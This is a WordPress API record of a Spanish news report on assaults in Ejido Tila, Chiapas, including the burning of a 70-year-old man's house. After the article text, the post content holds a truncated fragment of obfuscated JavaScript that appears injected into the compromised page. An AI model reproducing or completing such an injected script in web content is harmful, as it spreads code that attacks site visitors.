{"id":8579,"date":"2023-02-09T03:48:30","date_gmt":"2023-02-09T03:48:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8579"},"modified":"2023-02-09T03:48:30","modified_gmt":"2023-02-09T03:48:30","slug":"persisten-agresiones-y-tension-en-tila","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8579","title":{"rendered":"Persisten agresiones y tensi\u00f3n en Tila"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-08-at-5.02.03-PM-768x1024.jpeg\" alt=\"\" class=\"wp-image-8580\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-08-at-5.02.03-PM-768x1024.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-08-at-5.02.03-PM-225x300.jpeg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-08-at-5.02.03-PM-1152x1536.jpeg 1152w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-08-at-5.02.03-PM.jpeg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El Comit\u00e9 de Derechos Humanos Digna Ochoa dio a conocer que ha recibido la denuncia de agresiones y vulneraciones de derechos humanos, en el Ejido Tila, por parte de sujetos autodenominados \u201caut\u00f3nomos\u201d.En un comunicado, Digna Ochoa asegura que se viven momentos de tensi\u00f3n ante la falta de intervenci\u00f3n de las autoridades competentes, pese a que el problema en el Ejido Tila es de anta\u00f1o. \u201cSe est\u00e1 informando a la Secretaria General de Gobierno, a la Subsecretar\u00eda de los Derechos Humanos, Migraci\u00f3n y Poblaci\u00f3n y a la Comisi\u00f3n para el Di\u00e1logo con los Pueblos Ind\u00edgenas\u201d.Describe que en la \u00faltima agresi\u00f3n quemaron la casa de Mateo P\u00e9rez P\u00e9rez, de 70 a\u00f1os de edad aproximadamente. \u201cEl agresor se encuentra retenido en la c\u00e1rcel de Petalcingo, es un aut\u00f3nomo y el agredido es un poblador\u201d.\u201cEl motivo solo el hecho de no compaginar con los aut\u00f3nomos. El agresor se llama Pedro P\u00e9rez P\u00e9rez. Ahora est\u00e1n esperando un nuevo expediente, la primera vez no pudieron detenerlo\u201d, concluye Digna Ochoa.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El Comit\u00e9 de Derechos Humanos Digna Ochoa dio a conocer que ha recibido la denuncia de agresiones y vulneraciones de derechos humanos, en el Ejido Tila, por parte de sujetos autodenominados \u201caut\u00f3nomos\u201d.En un comunicado, Digna Ochoa asegura que se viven momentos de tensi\u00f3n ante la falta de intervenci\u00f3n de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8580,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8579","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8579","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8579"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8579\/revisions"}],"predecessor-version":[{"id":8581,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8579\/revisions\/8581"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8580"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8579"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8579"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8579"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}